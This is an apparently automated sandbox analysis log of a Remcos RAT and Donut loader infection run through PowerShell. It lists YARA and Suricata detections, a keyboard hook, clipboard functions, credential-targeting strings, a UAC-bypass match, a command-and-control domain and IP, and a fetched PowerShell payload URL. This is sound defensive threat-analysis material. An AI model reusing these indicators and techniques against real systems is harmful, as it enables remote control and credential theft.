              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49981 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49982 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49983 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49984 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49985 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49986 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49987 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49988 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49989 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49990 version: TLS 1.2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_0040AE51 FindFirstFileW,FindNextFileW,7_2_0040AE51
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,8_2_00407EF8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407898
              Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
              Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
              Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
              Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
              Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
              Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\

              Networking

              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49788 -> 37.120.208.40:56379
              Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.11:49763 -> 37.120.208.40:56379
              Source: Malware configuration extractor | URLs: abokirem.duckdns.org
              Source: global traffic | TCP traffic: 37.120.208.40 ports 56379,3,5,6,7,9
              Source: unknown | DNS query: name: abokirem.duckdns.org
              Source: global traffic | TCP traffic: 192.168.2.11:49763 -> 37.120.208.40:56379
              Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
              Source: Joe Sandbox View | IP Address: 37.120.208.40 37.120.208.40
              Source: Joe Sandbox View | IP Address: 168.119.145.117 168.119.145.117
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.11:49794 -> 178.237.33.50:80
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49749 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49975 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49978 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49857 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49985 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49984 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49982 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49977 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49979 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49988 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49983 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49989 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49990 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49936 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49986 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49981 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49980 -> 168.119.145.117:443
              Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.11:49987 -> 168.119.145.117:443
              Source: global traffic | HTTP traffic detected: GET /8KuV.ps1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 0x0.st | Connection: Keep-Alive
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: powershell.exe, powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: powershell.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: powershell.exe, 00000007.00000002.1530323108.0000000003748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2 equals www.facebook.com (Facebook)
              Source: powershell.exe, 00000007.00000002.1530323108.0000000003748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login2 equals www.yahoo.com (Yahoo)
              Source: powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: powershell.exe, 00000007.00000002.1529303725.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: 0x0.st
              Source: global trafficDNS traffic detected: DNS query: abokirem.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: powershell.exe, 00000014.00000002.1775216793.0000000007410000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.3145606062.0000000002B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: powershell.exe, 0000003A.00000002.3329140310.0000000007491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.1784027157.0000000008C9C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000019.00000002.1954330388.0000000008DBC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000020.00000002.2116165246.0000000008B7C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000025.00000002.2296515608.0000000008C7C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002A.00000002.2515947583.000000000942C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002F.00000002.2705660969.0000000008D1C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000035.00000002.3010363046.0000000008EBC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000003A.00000002.3443687584.0000000008D0C000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: powershell.exe, 0000000F.00000002.1613577949.0000000004D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1741717707.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1878755442.0000000004E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2017270277.00000000049B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2156116854.0000000004B2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2310818251.0000000005400000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2452107366.0000000004DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2657516198.0000000004FDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2818183841.0000000004BEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2987236011.0000000004CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: powershell.exe, powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: powershell.exe, 0000003A.00000002.3392420858.0000000008718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: powershell.exe, 00000007.00000002.1529489878.00000000030A4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: powershell.exe, 0000000F.00000002.1613577949.0000000004E75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1741717707.0000000004D44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1878755442.0000000004F74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2017270277.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2156116854.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2310818251.0000000005544000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2452107366.0000000004F24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2657516198.0000000005124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2818183841.0000000004D34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2987236011.0000000004E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st
              Source: powershell.exe, 0000003F.00000002.2987236011.0000000004E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0x0.st/8KuV.ps1
              Source: powershell.exe, 0000000F.00000002.1613577949.0000000004D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1741717707.0000000004BF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1878755442.0000000004E25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2017270277.00000000049B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2156116854.0000000004B2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2310818251.0000000005400000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2452107366.0000000004DDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2657516198.0000000004FDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2818183841.0000000004BEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2987236011.0000000004CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBlq
              Source: powershell.exe, 00000007.00000002.1529634326.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
              Source: powershell.exe, 00000007.00000002.1530323108.0000000003748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfh
              Source: powershell.exe, 00000007.00000002.1529634326.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: powershell.exe, 00000007.00000002.1529634326.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: powershell.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: powershell.exe, powershell.exe, 00000009.00000002.1524866704.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: powershell.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49857 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49936 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49975 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49977 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49978 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49979 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49980 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49981 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49982 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49983 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49984 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49985 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49986 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49987 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49988 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49989 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49990 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0041183A OpenClipboard,GetLastError,DeleteFileW,7_2_0041183A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_0040987A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004098E2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_00406DFC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_00406E9F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004068B5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,9_2_004072B5
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR

              E-Banking Fraud

              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000035.00000002.3010363046.0000000008EB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1875086180.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.3145606062.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2656381876.0000000007361000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2515947583.0000000009427000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.2953604842.0000000002E5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2705660969.0000000008D17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2116165246.0000000008B77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1627813047.0000000008888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2296515608.0000000008C77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1948275505.0000000008576000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2273047650.0000000007280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2110059731.000000000863D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2454927477.0000000007B30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1780515876.0000000008670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.4187297645.00000000080A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003A.00000002.3443687584.0000000008D07000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.2100059153.0000000007190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000002.2489969413.00000000089F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002F.00000002.2671409010.000000000741E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.1784027157.0000000008C97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000003F.00000002.3856215786.0000000008704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1954330388.0000000008DB7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000035.00000002.2648336815.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.2287089513.00000000081C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: cmd.exeProcess created: 47

              System Summary

              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000003A.00000002.3443687584.0000000008D0C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000002F.00000002.2572521172.0000000005EE8000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000002A.00000002.2399349513.00000000066F4000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000035.00000002.3013528096.000000000A691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000F.00000002.1617304143.0000000005E3E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000020.00000002.2049158626.0000000005AC9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000025.00000002.2204277686.0000000005B98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000002F.00000002.2705660969.0000000008D1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000025.00000002.2207744918.0000000005C38000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000044.00000002.3579093433.000000000570A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000002F.00000002.2567062053.0000000005E48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000035.00000002.2768925808.0000000006049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000019.00000002.1954879195.000000000B599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000020.00000002.2046612983.0000000005A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
